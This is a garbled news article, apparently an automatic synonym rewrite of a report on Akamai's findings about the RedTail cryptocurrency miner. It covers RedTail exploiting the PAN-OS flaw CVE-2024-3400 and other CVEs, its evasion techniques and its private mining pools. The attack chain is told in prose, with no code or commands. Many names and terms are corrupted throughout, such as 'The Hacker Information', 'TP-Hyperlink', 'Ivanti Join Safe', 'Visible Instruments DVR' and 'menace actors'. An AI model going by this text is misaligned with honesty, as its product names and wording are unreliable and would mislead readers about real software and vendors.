The menace actors behind the RedTail cryptocurrency mining malware have added a lately disclosed safety flaw impacting Palo Alto Networks firewalls to its exploit arsenal.
The addition of the PAN-OS vulnerability to its toolkit has been complemented by updates to the malware, which now incorporates new anti-analysis strategies, in line with findings from net infrastructure and safety firm Akamai.
“The attackers have taken a step forward by employing private crypto-mining pools for greater control over mining outcomes despite the increased operational and financial costs,” safety researchers Ryan Barnett, Stiv Kupchik, and Maxim Zavodchik mentioned in a technical report shared with The Hacker Information.
The an infection sequence found by Akamai exploits a now-patched vulnerability in PAN-OS tracked as CVE-2024-3400 (CVSS rating: 10.0) that would permit an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.
A profitable exploitation is adopted by the execution of instructions designed to retrieve and run a bash shell script from an exterior area that, in flip, is liable for downloading the RedTail payload based mostly on the CPU structure.
Different propagation mechanisms for RedTail contain the exploitation of recognized safety flaws in TP-Hyperlink routers (CVE-2023-1389), ThinkPHP (CVE-2018-20062), Ivanti Join Safe (CVE-2023-46805 and CVE-2024-21887), and VMWare Workspace ONE Entry and Identification Supervisor (CVE-2022-22954).
RedTail was first documented by safety researcher Patryk Machowiak in January 2024 in relation to a marketing campaign that exploited the Log4Shell vulnerability (CVE-2021-44228) to deploy the malware on Unix-based methods.
Then in March 2024, Barracuda Networks disclosed particulars of cyber assaults exploiting flaws in SonicWall (CVE-2019-7481) and Visible Instruments DVR (CVE-2021-42071) to put in Mirai botnet variants in addition to shortcomings in ThinkPHP to deploy RedTail.
The newest model of the miner detected in April packs in important updates in that it contains an encrypted mining configuration that is used to launch the embedded XMRig miner.
One other notable change is the absence of a cryptocurrency pockets, indicating that the menace actors could have switched to a personal mining pool or a pool proxy to reap monetary advantages.
“The configuration also shows that the threat actors are trying to optimize the mining operation as much as possible, indicating a deep understanding of crypto-mining,” the researchers mentioned.
“Unlike the previous RedTail variant reported in early 2024, this malware employs advanced evasion and persistence techniques. It forks itself multiple times to hinder analysis by debugging its process and kills any instance of [GNU Debugger] it finds.”
Akamai described RedTail as having a excessive stage of polish, a side not generally noticed amongst cryptocurrency miner malware households on the market within the wild.
“The investments required to run a private crypto-mining operation are significant, including staffing, infrastructure, and obfuscation,” the researchers concluded. “This sophistication may be indicative of a nation-state-sponsored attack group.”
